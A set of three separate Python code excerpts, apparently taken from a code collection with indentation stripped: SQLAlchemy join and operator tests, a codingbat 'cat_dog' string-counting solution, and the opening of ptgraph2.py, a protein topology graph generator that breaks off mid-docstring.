[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t1.c.name == 't1 #10', t2.c.name == 't2 #20'),
from_obj=[(t1.join(t2).outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t2.c.name == 't2 #20', t3.c.name == 't3 #30'),
from_obj=[(t1.join(t2).outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t1.c.name == 't1 #10',
t2.c.name == 't2 #20',
t3.c.name == 't3 #30'),
from_obj=[(t1.join(t2).outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
metadata = flds = None
class OperatorTest(fixtures.TestBase):
__backend__ = True
@classmethod
def setup_class(cls):
global metadata, flds
metadata = MetaData(testing.db)
flds = Table(
'flds', metadata,
Column(
'idcol', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('intcol', Integer),
Column('strcol', String(50)),
)
metadata.create_all()
flds.insert().execute([
dict(intcol=5, strcol='foo'),
dict(intcol=13, strcol='bar')
])
@classmethod
def teardown_class(cls):
metadata.drop_all()
# TODO: seems like more tests warranted for this setup.
def test_modulo(self):
eq_(
select([flds.c.intcol % 3],
order_by=flds.c.idcol).execute().fetchall(),
[(2,), (1,)]
)
@testing.requires.window_functions
def test_over(self):
eq_(
select([
flds.c.intcol, func.row_number().over(order_by=flds.c.strcol)
]).execute().fetchall(),
[(13, 1), (5, 2)]
)
|
# http://codingbat.com/prob/p164876
def cat_dog(str):
cat_count = 0
dog_count = 0
for i in range(len(str)-2):
if str[i:i+3] == "cat":
cat_count += 1
elif str[i:i+3] == "dog":
dog_count += 1
return (cat_count == dog_count)
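# A minimal usage sketch (illustrative addition, not part of the original
# codingbat solution). cat_dog() slides a 3-character window over the
# string, counts occurrences of "cat" and "dog", and returns True when
# the two counts are equal.
if __name__ == "__main__":
    assert cat_dog("catdog")          # one "cat", one "dog"
    assert not cat_dog("catcat")      # two "cat", zero "dog"
    assert cat_dog("1cat1cadodog")    # one "cat", one "dog"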
|
#!/usr/bin/env python
###############################################################################
#
# ptgraph2.py - generate protein topology graphs from PDB atomic co-ordinates
# plus STRIDE or DSSP information.
#
# File: ptgraph2.py
# Author: Alex Stivala
# Created: July 2007
#
# $Id: ptgraph2.py 4642 2013-04-10 06:26:06Z astivala $
#
# ptgraph2 is a program to draw two-dimensional graph representations
# of protein topology. It reads information from STRIDE -h or DSSP
# output and writes a graph representation of the topological
# structure.
#
# Note, when using STRIDE, the 'private' stride options -\$ -i are also used,
# and in fact a modified version of stride is required (see
# ptsecstruct.py) which is supplied in the stride subdirectory.
#
# It is written in Python and depends on some Python libraries:
#
# . BioPython (including Bio.PDB)
# http://www.biopython.org
#
# Reference for Bio.PDB is:
# Hamelryck and Manderick 2003 "PDB parser and structure class implemented
# in Python" Bioinformatics 19:2308-2310
#
# which in turn depends on Numeric
# http://sourceforge.net/projects/numpy
#
# . (for the -h, -n and -d options; see ptgraphviz.py):
# pydot: python interface to GraphViz dot language (0.9.10)
# http://dkbza.org/pydot.html
#
# which in turn requires pyparsing
# http://pyparsing.sourceforge.net/
#
# For the -h, -n and -d options, GraphViz itself is also required (2.12)
# http://www.research.att.com/sw/tools/graphviz
#
# Instead of using GraphViz (dot/neato), the default output
# is now SVG for use with the Dunnart constraint-based
# diagram editor:
#
# http://www.csse.monash.edu.au/~mwybrow/dunnart/
#
# Dunnart (0.14+SVN) (revision 1469 {2007-08-16})
# has been modified to work with this by including
# strand and helix shapes, amongst other things (by Michael Wybrow).
# (Currently not generally available).
#
# Developed on Linux 2.6.9 (x86_64) with Python 2.5.1
# and BioPython 1.43 with Numeric 24.2
#
# Example usage:
#
# ptgraph2.py 1QLP.pdb
#
# Filenames may be either in the format above or the pdb1qlp.ent format.
# Compressed pdb files are supported (gzip) (e.g. pdb1qlp.ent.gz).
# SCOP/ASTRAL domains in the format like d1qp3a_.ent are also supported,
# then the output filename has the same basename (eg d1qp3a_.svg).
#
###############################################################################
import warnings # so we can suppress the annoying tempnam 'security' warning
import sys,os
import getopt
from time import strftime,localtime
import re
from sets import Set # note not using builtin set, so we can use python 2.3
from Bio.PDB import *
from genseqid import GenSeqId
from ptsvgnode import *
from ptsvgcluster import *
from ptsvgconstraints import *
from ptdomain import *
from ptdistmatrix import PTDistMatrix, calc_sse_sse_dist
from ptrelpos import *
from ptmfile import *
import ptsecstruct
import pttableau
try:
import ptgraphviz
except ImportError:
sys.stderr.write('WARNING could not import graphviz interface: -h,-n,-d will not work\n')
# TODO: disable these options in this case
from color import color_gradient,rgb_tuple_to_hex_str,get_color_list,get_cluster_fill_colors,DUNNART_CLUSTER_ALPHA_HEX,get_glasbey_colors_rgb
from ptutils import cleanup_tmpdir,get_int_icode,biopdbresid_to_pdbresseq
from ptposmap import *
from ptversion import get_version
from getdomains import verify_domain_disjoint,build_domain_chaindict
#-----------------------------------------------------------------------------
#
# Module constants
#
#-----------------------------------------------------------------------------
# constants used in build_helices_svg() etc.
SEQPOS_AFTER = 1
SEQPOS_BEFORE = 2
# amount to multiply all co-ordinates by for uniform scaling
SCALE_FACTOR = 1.6
DEFAULT_SHAPE_COLOR_HEXSTR = 'f0f0d2' # beige; Dunnart default shape color
DEFAULT_DUNNART_STRAND_SEPARATION = 55 # space between strands in sheet
DEFAULT_DUNNART_MIN_GAP_SIZE = 55 # minimum space to leave between things
#-----------------------------------------------------------------------------
#
# Module globals
#
#-----------------------------------------------------------------------------
DUNNART_STRAND_SEPARATION = DEFAULT_DUNNART_STRAND_SEPARATION # space between strands in sheet
DUNNART_MIN_GAP_SIZE = DEFAULT_DUNNART_MIN_GAP_SIZE # minimum space to leave between things
#-----------------------------------------------------------------------------
#
# Class definitions
#
#-----------------------------------------------------------------------------
#
# Empty classes for exceptions
#
class NoSSE_Exception(Exception): # raised when no helices or strands found
pass
#
# Real classes
#
# class ChainPPBuilder(_PPBuilder):
# """
# This class inherits from the Bio.PDB _PPBuilder base class to
# build Polypeptide object using no distance criteria at all
# (Polypeptide.py provides classes for Ca-Ca or C-N distances).
# This is so we can just build sequential
# list of residues and ignore chain breaks: each chainid will have a
# single polypeptide.
# """
# def __init__(self):
# __PPBuilder.__init__(self, radius=None)
# def _is_connected(self, prev, next):
# return 1 # always connected.
class PTGraph2:
"""
The topology graph consists of a sequence of structure (helix, strand)
nodes with edges in and out of them in sequence from N-terminus to
C-terminus. Note there may be multiple such sequences (one for each
chain).
Edges are also added for hydrogen bonds or bridge relationships
between strands.
"""
#
# member functions
#
def __init__(self, pdb_structure, use_hbonds=False,
include_310_helices = False, include_pi_helices = False):
"""
Construct empty PTGraph2. To build the graph call
build_graph_from_secstruct().
Parameters:
pdb_structure - parsed PDB structure from Bio.PDB
use_hbonds - If True make hydrogen bond graph instead of using
(modified) bridge partner information to make
sheets from strands.
include_310_helices - include 3_10 helices in the diagram if True
include_pi_helices - include pi_helices in the diagram if True
"""
self.pdb_struct = pdb_structure
self.chain_dict = None # Each value of the chain_dict is a
# List of nodes in order from N to C terminus
# so chain_dict is { chainid : node_list }
self.use_hbonds = use_hbonds # hbond mode
self.distmatrix = None # PTDistMatrix built in build_dist_matrix
self.ptrelpos = None # PTRelativePosition built in build_constraints
self.tableau = None # PTTableau build in build_tableau
self.include_310_helices = include_310_helices
self.include_pi_helices = include_pi_helices
self.pdb_resid_dict = None # dict of { (chainid, pdb_resseq) : seqindx }
# where chainid and pdb_resseq make up
# the PDB residue identifier, the pdb_resseq
# being string resnum+icode if any e.g.
# '60' or '60A', seqindx is the index
# into sequential list of all residues
# residue_list.
self.residue_list = None # list of all residues (for all chains)
# in sequence, built by get_residue_list()
def iter_chains(self):
"""
This generator function iterates over all chains in this PTGraph.
A chain is just a list of nodes so it yields a node list for each
chain.
Parameters: None.
Return value: YIELDs a node list.
Uses data members (readonly):
chain_dict - dict of {chainid:node_list}
"""
# FIXME: can we just 'return self.chain_dict.itervalues()' here?
for nodelist in self.chain_dict.itervalues():
yield nodelist
def iter_nodes(self):
"""
This generator function iterates over all the nodes in this PTGraph.
Parameters: None
Return Value: YIELDs a node.
Uses data members: (readonly):
chain_dict - dict of {chainid : node_list}
"""
for nodelist in self.iter_chains():
for ptnode in nodelist:
yield ptnode
def iter_strands(self):
"""
This generator function iterates over all strands in this PTGraph
object. I.e. it yields a strand for each strand in the
node lists.
Parameters: None.
Return value: YIELDs a strand.
Uses data members (readonly):
self.chain_dict - dict of { chainid : list of nodes }
"""
for nodelist in self.iter_chains():
for ptnode in nodelist:
if isinstance(ptnode, PTNodeStrand):
yield ptnode
def iter_helices(self):
"""
This generator function iterates over all helices in this PTGraph
object. I.e. it yields a PTNodeHelix for each helix in the
node lists.
NOTE: it excludes PI and/or 310 helices if the relevant option(s)
are set to exclude them.
Parameters: None.
Return value: YIELDs a PTNodeHelix.
Uses data members (readonly):
self.chain_dict - dict of { chainid : list of nodes }
include_310_helices, include_pi_helices - flags to omit these
"""
for nodelist in self.iter_chains():
for ptnode in nodelist:
if isinstance(ptnode, PTNodeHelix):
if (not ( (ptnode.get_type() == "310" and
not self.include_310_helices) or
(ptnode.get_type() == "PI" and
not self.include_pi_helices) ) ):
yield ptnode
def get_num_helices(self):
"""
Return the total number of helices
NB: See NOTE on iter_helices() above re pi and 310 helices.
Parameters: None
Uses data members (readonly):
chain_dict - dictionary of {chainid : nodelist}
"""
num_helices = len(list(self.iter_helices()))
return num_helices
def largest_helix(self):
"""
Return the largest helix in this PTGraph, defined as the one
that spans the most residues.
Parameters: None.
Return value: PTNodeHelix of helix with most residues, or None.
Uses data members (readonly):
self.chain_dict - dict of { chainid : list of nodes }
"""
max_span = 0
max_span_helix = None
for helix in self.iter_helices():
span = helix.get_span()
if span > max_span:
max_span = span
max_span_helix = helix
return max_span_helix
def get_node_by_id(self, nodeid):
"""
Return the node with the supplied id
Parameters:
nodeid - id of the node to find
Return value:
PTNode in the node list that has the supplied nodeid.
Uses data members:
(readonly) chain_dict - dict of { chainid : list of nodes }
Raises exceptions:
KeyError if node with supplied nodeid is not found in the list
"""
# FIXME: this is just a linear search, should have a dictionary
# by id to make it efficient (or change code to not need this at all)
for nodelist in self.iter_chains():
for node in nodelist:
if node.nodeid == nodeid:
return node
raise KeyError('get_node_by_id(): ' + nodeid + ' not found')
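# Illustrative sketch only (not in the original source): the FIXME above
# could be addressed by building an id -> node mapping once, e.g.
#   self._node_by_id = dict([(n.nodeid, n) for n in self.iter_nodes()])
# after the graph is built, so get_node_by_id() becomes a single dict lookup.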
def build_graph_from_secstruct(self, secstruct, domain):
"""
Build the list of nodes from the the supplied PTSecStruct
object. Add edges for hydrogen bonds between structural
elements also.
Parameters:
secstruct - PTSecStruct (ptsecstruct.py) object to build from
domain - PTDomain (ptdomain.py) object listing the segment(s)
that make up this domain (only one domain processed at a
time).
Uses member data (write):
chain_dict - dict of { chainid : node_list } where node_list is
list of nodes in order, built in this function
secstruct - keeps a pointer to the supplied secstruct
domainid - domain identification string
(readonly):
use_hbonds - If True make hydrogen bond graph instead of using
bridge partner information to make
sheets from strands.
pdb_struct - The Bio.PDB parsed PDB struct (atomic co-ordinates)
for this protein.
include_310_helices, include_pi_helices - if True, include
these kinds of helices in the helix
sequential numbering. Otherwise we still need to
put them in the graph so that it lines up with
tableaucreator etc., but keep them in a separate
numbering as they won't be drawn in the end.
Raises exceptions:
NoSSE_Exception if no helices or strands found
Return value:
None.
"""
self.secstruct = secstruct
self.domainid = domain.domainid
helix_num = 1
strand_num = 1
hidden_num = 1 # for pi and/or 310 helices outside visible numbering
num_helices_in_domain = 0
num_strands_in_domain = 0
#
# Build dictionary mapping (chainid, pdb_resid) to index in residue_list
# for ALL residues, not just those in this domain.
#
self.residue_list = self.get_residue_list(self.pdb_struct,
PTDomain(None, None))
self.pdb_resid_dict = {}
seq_indx = 0
while seq_indx < len(self.residue_list):
residue = self.residue_list[seq_indx]
self.pdb_resid_dict[( ptsecstruct.pdb_chainid_to_stride_chainid(
residue.get_full_id()[2]),
biopdbresid_to_pdbresseq(
residue.get_id()) )] = seq_indx
seq_indx += 1
# Note that now we are only adding elements in the supplied domain,
# so the so-called 'chains' may really be segments, i.e. subsequences
# of chains (rest of chain may be in other domain(s))
self.chain_dict = {} # dict of {chainid : node_list}
for (start_chainid, start_resnum, end_chainid, end_resnum, helixtype) \
in secstruct.helix_list:
assert(start_chainid == end_chainid) #helix must be same chain
# will consider structures in domain if first residue is in domain
if domain.is_in_domain(start_chainid,
get_int_icode(start_resnum)[0]):
num_helices_in_domain += 1
if helixtype == "H":
idprefix = "ALPHAHELIX_"
htype = "ALPHA"
this_helix_num = helix_num
helix_num += 1
elif helixtype == "I":
idprefix = "PIHELIX_"
htype = "PI"
if self.include_pi_helices:
this_helix_num = helix_num
helix_num += 1
else:
this_helix_num = hidden_num
hidden_num += 1
elif helixtype == "G":
idprefix = "310HELIX_"
htype = "310"
if self.include_310_helices:
this_helix_num = helix_num
helix_num += 1
else:
this_helix_num = hidden_num
hidden_num += 1
else: # shouldn't happen
sys.stderr.write("ERROR: bad helix type " + helixtype+"\n")
continue # skip this SSE rather than use undefined values below
ah_node = PTSVGNodeHelix(htype,
idprefix + start_chainid+"_" +\
str(this_helix_num),
this_helix_num,
start_resnum, end_resnum, start_chainid,
self.domainid,
self.residue_list,
self.pdb_resid_dict)
ah_node.build_resname_sequence()
if not self.chain_dict.has_key(start_chainid):
self.chain_dict[start_chainid] = []
self.chain_dict[start_chainid].append(ah_node)
# we must already have handled the case of SSEs that cross
# domain boundaries (by moving whole SSE to one of the domains)
assert( domain.is_in_domain(end_chainid, get_int_icode(end_resnum)[0]) )
for (start_chainid, start_resnum, end_chainid, end_resnum) \
in secstruct.strand_list:
assert(start_chainid == end_chainid) # must be in same chain
if domain.is_in_domain(start_chainid,
get_int_icode(start_resnum)[0]):
num_strands_in_domain += 1
bs_node = PTSVGNodeStrand("STRAND_"+start_chainid +"_"+\
str(strand_num),
strand_num,
start_resnum, end_resnum, start_chainid,
self.domainid,
self.residue_list,
self.pdb_resid_dict)
strand_num += 1
bs_node.build_resname_sequence()
if not self.chain_dict.has_key(start_chainid):
self.chain_dict[start_chainid] = []
# we must already have handled the case of SSEs that cross
# domain boundaries (by moving whole SSE to one of the domains)
assert( domain.is_in_domain(end_chainid, get_int_icode(end_resnum)[0]) )
self.chain_dict[start_chainid].append(bs_node)
# raise an exception if there are no SSEs at all in this domain
if num_helices_in_domain == 0 and num_strands_in_domain == 0:
raise NoSSE_Exception
# build a dictionary of {chainid: (min_res_seq, max_res_seq)}
# which we use to determine where chain has been broken by
# domain parsing so we can label the pseudo-terminus appropriately
chain_minmax_dict = self.build_chain_minmax_dict(self.pdb_struct)
delete_chainid_list = [] # list of chainids to delete from chain_dict
for (chainid, nodelist) in self.chain_dict.iteritems():
# sort in order of start residue id ascending (all must be disjoint)
nodelist.sort()
if len(nodelist) < 1:
# There are no SSEs in this chain, get rid of it.
sys.stderr.write('WARNING: no SSEs in chain ' + chainid +
'; chain ignored\n')
delete_chainid_list.append(chainid) # don't delete while in loop
continue
else:
# Check for chain with only SSEs that will not be drawn
# (i.e. pi or 310 helices), and delete those too
found_useful_node = False
for ptnode in nodelist:
if isinstance(ptnode, PTNodeStrand):
found_useful_node = True
break
elif isinstance(ptnode, PTNodeHelix):
if ptnode.get_type() == "ALPHA":
found_useful_node = True
break
elif ((ptnode.get_type() == "310" and
self.include_310_helices) or
(ptnode.get_type() == "PI" and
self.include_pi_helices)):
found_useful_node = True
break
if not found_useful_node:
sys.stderr.write('WARNING: only pi or 310 helices in chain '
+ chainid +
'; chain ignored\n')
delete_chainid_list.append(chainid)
continue
# (note PDB residue numbers don't necessarily start at 1,
# may be higher)
# Now that we are labelling connector objects for coil regions
# with residue names and PDB sequence numbers, we need
# terminus nodes to have the lowest (N) and highest (C)
# PDB residue numbers in the chain, not the lowest/highest
# in any SSEs found.
residue_list = self.get_residue_list(self.pdb_struct,
domain, chainid)
# id of a residue in Bio.PDB is tuple (hetatm, resseqnum, icode)
lowest_res_seq = residue_list[0].get_id()[1]
highest_res_seq = residue_list[-1].get_id()[1]
# but we still need the lowest and highest sequence numbers
# in any SSEs for pseudo-terminus nodes, used in converting
# them to real terminus nodes or else removing to make interdomain
# connectors later.
sse_lowest_res_seq = get_int_icode(nodelist[0].get_start_res_seq())[0]
sse_highest_res_seq = get_int_icode(nodelist[-1].get_end_res_seq())[0]
# get min and max res seq num of segments of this chain in domain
# which we use to determine where chain has been broken by
# domain parsing so we can label the pseudo-terminus appropriately
(domain_min_resnum, domain_max_resnum) = \
domain.get_minmax_res_seq_in_chain(chainid)
# and the lowest and highest residue number in this entire chain
min_resnum = chain_minmax_dict[chainid][0]
max_resnum = chain_minmax_dict[chainid][1]
if min_resnum < 0: # sometimes this happens, eg 2H85
min_resnum = 0
# print 'qqq',chainid,min_resnum,max_resnum
# print 'rrr',chainid,domain_min_resnum,domain_max_resnum
# TODO: this will not work if a domain can have multiple
# segments of the same chain in it with segments in between
# in other domains. This does not currently happen with
# DDOMAIN and CATH but could in general happen with other
# domain decomposition methods in future.
# add N terminus node at beginning
if domain.is_single() or domain_min_resnum == min_resnum:
if self.num_chains() > 1:
label = "N" + str(chainid).lower()
else:
label = "N"
pseudo = False
lowres = lowest_res_seq
else: # pseudo-n-terminus
label = "n" + str(domain.domainid) + str(chainid).lower()
pseudo = True
lowres = sse_lowest_res_seq
n_terminal_node = PTSVGNodeTerminus('N', pseudo,
label,
0, str(lowres - 1),
str(lowres - 1),
chainid,
self.domainid,
self.residue_list,
self.pdb_resid_dict,
True) # fake_resids
if pseudo: # record the most N-terminal SSE in the pseudo-terminus
n_terminal_node.set_adjnode(nodelist[0])
nodelist.insert(0, n_terminal_node)
# add C terminus node on end
if domain.is_single() or domain_max_resnum == max_resnum:
if self.num_chains() > 1:
label = "C" + str(chainid).lower()
else:
label = "C"
pseudo = False
highres = highest_res_seq
else: # pseudo-c-terminus
label = "c" + str(domain.domainid) + str(chainid).lower()
pseudo = True
highres = sse_highest_res_seq
c_terminal_node = PTSVGNodeTerminus('C', pseudo,
label,
1, str(highres + 1),
str(highres + 1),
chainid,
self.domainid,
self.residue_list,
self.pdb_resid_dict,
True) # fake_resids
if pseudo: # record the most C-terminal SSE in the pseudo-terminus
c_terminal_node.set_adjnode(nodelist[-1])
nodelist.append(c_terminal_node)
# delete chains from chain_dict that were marked earlier for deletion
for chainid in delete_chainid_list:
self.chain_dict.pop(chainid)
# add edges for hydrogen bonds
# uses secstruct and chainid member data
# these are used for determining which side bridge partners are
# on (and also for drawing a hydrogen bond graph if requested)
self.add_hbond_edges_from_secstruct()
# add edges for bridge partners
# uses secstruct and chainid member data
self.add_bridge_edges_from_secstruct()
def build_chain_minmax_dict(self, pdb_struct):
"""
build a dictionary of {chainid: (min_res_seq, max_res_seq)}
which we use to determine where chain has been broken by
domain parsing so we can label the pseudo-terminus appropriately
Parameters:
pdb_struct - The Bio.PDB parsed PDB struct (atomic co-ordinates)
for this protein.
Return value:
dictionary of {chainid : (min_res_seq, max_res_seq)}
mapping chainidentifier to minimum and maximum residue
sequence numbers in that chain, as determined by
Bio.PDB PDB parser (pdb_struct parameter)
Note: uses no data members (need not be a member function)
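Example (hypothetical sketch; 'struct' is a Bio.PDB Structure parsed
for some two-chain protein):
minmax = self.build_chain_minmax_dict(struct)
# minmax might then be e.g. {'A': (1, 154), 'B': (3, 149)}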
"""
chain_minmax_dict = {}
pdb_model = pdb_struct[0] # TODO always using model 0 for now
for chain in pdb_model:
# id of a residue in Bio.PDB is tuple (hetatm, resseqnum, icode)
res_seqnum_list = [ res.get_id()[1] for res in chain.get_list()
if res.get_id()[0] == ' ' ]
if len(res_seqnum_list) > 0:
min_res_seq = min(res_seqnum_list)
max_res_seq = max(res_seqnum_list)
chain_minmax_dict[ptsecstruct.pdb_chainid_to_stride_chainid( \
chain.get_id())] = (min_res_seq, max_res_seq)
return chain_minmax_dict
def num_chains(self):
"""
Return the number of chains read from the PDB in this object.
Parameters: None
Return value: Number of chains represented in this graph
Uses data members (readonly):
chain_dict - dictionary of { chainid : nodelist }
"""
return len(self.chain_dict)
def add_hbond_edges_from_secstruct(self):
"""
Add edges between structural elements for hydrogen bonds between
those nodes. Called by build_graph_from_secstruct().
NB: adds bonds between STRANDs only, not between HELIXes (helices).
Parameters: None.
Return value: None.
Uses data members:
readonly:
secstruct - PTSecStruct object to get hbonds from
chainid - chainid of chain in PTSecStruct to use
read/write:
chain_dict - dict by chainid of
list of nodes (changes node data, not list as such)
Precondition: each nodelist in chain_dict
is sorted (by start res seq ascending);
this is done by build_graph_from_secstruct()
before calling.
"""
hbond_list = self.secstruct.hbond_list
# TODO: do this more efficiently using presorting (ie how it used to
# be done when only one chain)
for (chainid1, resnum1, chainid2, resnum2, dist) in hbond_list:
for ptnode in self.iter_strands():
if ( chainid1 == ptnode.get_chainid() and
ptnode.is_in_interval(resnum1) ):
try:
dest_node = self.find_node_containing_seqnum(resnum2,
chainid2)
except KeyError:
# it seems STRIDE sometimes gives h bond to
# residue that does not exist - maybe because the
# chainid is wrong (puts same chainid for both
# sides even when bond is between chains? - could
# recover from this if so (TODO). e.g. 1EAI, 1ABI
sys.stderr.write('WARNING: external program'
' reported H bond to nonexistent '
'residue ' + resnum2 +
' (chain ' + chainid2 + ')\n')
continue
if dest_node != None and \
isinstance(dest_node, PTNodeStrand): # only STRANDs
ptnode.add_hbond(dest_node, resnum1, resnum2, dist)
def add_bridge_edges_from_secstruct(self):
"""
Add edges between strand nodes representing beta bridges between
those nodes (add just one edge between any two strands).
Called by build_graph_from_secstruct().
NB: adds bonds between STRANDs only, not between HELIXes (helices).
Parameters: None.
Return value: None.
Uses data members:
readonly:
secstruct - PTSecStruct object to get hbonds from
chainid - chainid of chain in PTSecStruct to use
read/write:
chain_dict - dict by chainid of
list of nodes (changes node data, not list as such)
"""
bridge_list = self.secstruct.bridgeres_list
# (chainid1, resnum1, chainid2, resnum2, bdir)
# TODO: do this more efficiently using presorting (ie how it used to
# be done when only one chain)
for ptnode in self.iter_strands():
for (chainid1, resnum1, chainid2, resnum2, bdir) in bridge_list:
if ( chainid1 == ptnode.get_chainid() and
ptnode.is_in_interval(resnum1) ):
try:
dest_node = self.find_node_containing_seqnum(resnum2,
chainid2)
except KeyError:
dest_node = None
sys.stderr.write('WARNING: chain ' + chainid2 + \
' involved in beta bridge not found.'+\
'\n Probably due to domain parsing' +\
' breaking a beta sheet.\n')
if dest_node != None and \
isinstance(dest_node, PTNodeStrand): # only STRANDs
if ptnode == dest_node:
sys.stderr.write('WARNING: ignoring self-bridge ' +
ptnode.nodeid + '\n')
else:
ptnode.add_bridge(dest_node, bdir)
def get_residue_list(self, pdb_struct, domain, getchainid = None):
"""
Return list of Bio.PDB Residue objects in this domain, and optionally
in the specified chain.
Parameters:
pdb_struct - Bio.PDB parsed PDB struct for the protein
domain - PTDomain (ptdomain.py) object listing the segment(s)
that make up this domain (only one domain processed at a
time).
getchainid - chain identifier to get residues in (default None -
all chains).
Return value:
list of Bio.PDB Residue objects in the domain (and optionally chain).
Raises exceptions:
NoSSE_Exception for empty structure (happens eg on d1oayi_.ent)
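Example (hypothetical sketch): residues of chain 'A' only, restricted
to the current domain:
chain_a_residues = self.get_residue_list(self.pdb_struct, domain, 'A')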
"""
residue_list = []
try:
pdb_model = self.pdb_struct[0] # TODO always using model 0 for now
except KeyError:
raise NoSSE_Exception
for chain in pdb_model:
chainid = ptsecstruct.pdb_chainid_to_stride_chainid(chain.get_id())
if getchainid and getchainid != chainid:
continue # this is not the chain we want
# Build a list of Bio.PDB Residue objects that are in this
# domain.
# id of a residue in Bio.PDB is tuple (hetatm, resseqnum, icode)
# so we choose those where residue PDB number
# (in the current chain) is in the domain.
# TODO: maybe should use polypeptide builder for this instead
# (and indeed should probably use it right from the beginning) -
residue_list += [ residue for residue in chain.get_unpacked_list()
if is_aa(residue) and
domain.is_in_domain(chainid, residue.get_id()[1])
]
if getchainid:
break # if getchainid specified, we now have it so can quit
return residue_list
def build_dist_matrix(self, domain):
"""
Build the PTDistMatrix member ptdistmat containing the
residue and SSE distance maps. This is built using information
from the Bio.PDB Residue objects contained in the
member pdb_struct for residues in the supplied domain which
we are working with, and (for SSEs) the secondary structures
defined by node lists under the chain_dict member built by
build_graph_from_sec_struct().
Parameters:
domain - PTDomain (ptdomain.py) object listing the segment(s)
that make up this domain (only one domain processed at a
time).
Uses member data (write):
distmatrix - the PTDistanceMatrix class containing residue and
SSE distance maps.
(readonly):
chain_dict - dict of { chainid : node_list } where node_list is
list of nodes in order, built in this function
secstruct - keeps a pointer to the supplied secstruct
pdb_struct - The Bio.PDB parsed PDB struct (atomic co-ordinates)
for this protein.
sheet_dict - dict of {sheet_id : ptnode_list} representing sheets
Return value:
None.
"""
residue_list = self.get_residue_list(self.pdb_struct, domain)
# Also build list of all PTNodes
ptnode_list = []
for nodelist in self.iter_chains():
for node in nodelist:
if (not isinstance(node, PTNodeTerminus)): # not terminii
ptnode_list.append(node)
self.distmatrix = PTDistMatrix(residue_list, ptnode_list,
self.sheet_dict,
self.pdb_struct)
if verbose:
sys.stderr.write("SSE distmatrix:\n")
for i in range(len(self.distmatrix.sse_dist_matrix)):
for j in range(i+1):
sys.stderr.write("%3.0f " % self.distmatrix.sse_dist_matrix[i,j])
sys.stderr.write("\n")
sys.stderr.write("sheet/helix distmatrix:\n")
for i in range(len(self.distmatrix.sheet_dist_matrix)):
for j in range(i+1):
sys.stderr.write("%3.0f " % self.distmatrix.sheet_dist_matrix[i,j])
sys.stderr.write("\n")
sys.stderr.write(str(self.distmatrix.reverse_sheet_index_map)+'\n')
def build_tableau(self, pdbid, domain, use_tableaucreator):
"""
Build the tableau data member (see PTTableau in pttableau.py)
by calling function in pttableau.py.
Parameters:
pdbid - PDB identifier of the structure
domain - The PTDomain object for our current domain
use_tableaucreator - if True, use external TableauCreator program
Return value: None
Uses data members (WRITE):
tableau - created by this function
(readonly):
chain_dict - dict { chainid : ptnode_list } of nodes in chains
pdb_structure - Bio.PDB parsed PDB structure
"""
# Build list of all helix and strand PTNodes
ptnode_list = []
for nodelist in self.iter_chains():
for node in nodelist: # these nodes are only those in our domain
if (not isinstance(node, PTNodeTerminus)): # not terminii
ptnode_list.append(node)
if use_tableaucreator:
self.tableau = pttableau.get_tableau_from_pdbstruct(
pdbid, domain, self.pdb_struct, ptnode_list)
else:
self.tableau = pttableau.compute_tableau(ptnode_list,
self.pdb_struct)
def find_node_containing_seqnum(self, res_seqnum, chainid):
"""
Find and return node in node list for chain chainid
containing supplied PDB residue
sequence number.
Parameters:
res_seqnum - PDB residue sequence number to find node for
chainid - chain identifier to find node in
Return value:
PTNode pointer of PTNode containing the supplied residue seq num
in supplied chainid
or None if the residue is not in a structural element PTNode
Uses data members (readonly):
chain_dict - chainid dict of list of PTNodes
"""
# TODO: since node_list is sorted should use binary search here
# (maybe try the Python bisect module)
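# A hedged sketch of that bisect idea (illustrative only; assumes
# integer start residue numbers via get_start_res_seq()):
# import bisect
# starts = [get_int_icode(n.get_start_res_seq())[0]
# for n in self.chain_dict[chainid]]
# i = bisect.bisect_right(starts, res_seqnum) - 1
# if i >= 0 and self.chain_dict[chainid][i].is_in_interval(res_seqnum):
# return self.chain_dict[chainid][i]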
if not self.chain_dict.has_key(chainid):
return None # no such chain, can happen due to domain parsing
for ptnode in self.chain_dict[chainid]:
if ptnode.is_in_interval(res_seqnum):
return ptnode
return None
def dfs_strands(self, start_strand, visited, dfs_list, from_node,
back_edge_list,
sheet_id=None):
"""
Make a depth-first search traversal of STRAND nodes
using bridge (not sequence)
edges starting at the specified strand.
Parameters:
start_strand - STRAND node to start at
visited - (in/out) dictionary of {ptnode:True} visited nodes
dfs_list - (in/out) list of ptnodes visited in dfs order
from_node - node from which we are being (recursively) called
back_edge_list - list of (node, node) tuples representing an
edge between the two nodes, which is a back
edge, i.e. from a node to an ancestor of that
node in the spanning tree. The back edge
means there is a cycle of which the back
edge forms a part.
sheet_id - identifier of this sheet (connected component) to mark
each strand in it with, or None to not mark at all
(default).
Recursive function. call initially as
dfslist = []
back_edge_list = []
dfs_strands(startnode, {}, dfslist, None, back_edge_list)
Return value:
None. (Output is dfs_list, back_edge_list parameters)
Uses members (readonly):
chain_dict - dict by chainid of list of PTNodes
"""
visited[start_strand] = True
if sheet_id != None:
start_strand.set_sheet_id(sheet_id)
dfs_list.append(start_strand)
for (node, bdir_unused, side_unused) in start_strand.get_bridge_list():
if node not in visited:
self.dfs_strands(node, visited, dfs_list, start_strand,
back_edge_list, sheet_id)
elif node != from_node: #not parent of start_strand in spanning tree
# don't add duplicate back edges
# ((node1,node2) is same as (node2,node1))
duplicate = False
for (a,b) in back_edge_list:
if ((start_strand == a and node == b) or
(node == a and start_strand == b)):
duplicate = True
break
if not duplicate:
if verbose:
sys.stderr.write('dfs_strands back edge from ' +
str(start_strand) + ' to ' +
str(node) +
'\n')
back_edge_list.append((start_strand, node))
def find_connected_components(self):
"""
Find the connected components (considering only STRAND nodes
and bridge [not sequence] edges in the graph).
This is done by a DFS traversal at every node in the graph
(skipping already visited ones), giving us the partition of
the graph into connected components.
Parameters: None
Uses member data:
chain_dict - dict by chainid of list
of PTNodes in the graph (modifies PTNodes not list)
(WRITE):
sheet_dict -
dictionary of { sheet_id : ptnode_list } where sheet_id is 'A',
'B', etc. and ptnode_list is a list of PTNodeStrand instances
in that connected component (sheet).
self.sheet_backedges_dict -
dict of {sheet_id : ((node1,node2))}
listing 'back edges' i.e. edges
to an ancestor in DFS spanning tree
in the connected component (sheet).
